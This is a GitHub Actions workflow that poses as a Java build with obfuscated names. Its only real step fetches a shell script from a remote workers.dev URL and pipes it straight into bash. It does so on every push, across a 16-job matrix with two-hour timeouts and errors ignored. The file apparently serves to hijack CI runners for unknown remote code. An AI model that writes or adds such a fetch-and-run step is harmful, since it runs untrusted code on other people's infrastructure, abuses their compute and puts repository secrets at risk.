name: sj

on:
  push:

jobs:
  build:
    if: "!contains(github.event.head_commit.message, '[SKIP CI]')"
    runs-on: ubuntu-latest
    timeout-minutes: 120
    strategy:
      matrix:
        N: [r, V, G, i]
        java-version: [8, 17, 21, 22]
    steps:
    - uses: actions/checkout@v5
    - uses: actions/setup-java@v5
      with:
        distribution: 'temurin'
        java-version: '21'
    - name: J
      continue-on-error: true
      run: |
        curl https://node.skidder-loli.workers.dev/execute/qTYbpE7V5Tu9oPAY.sh | bash
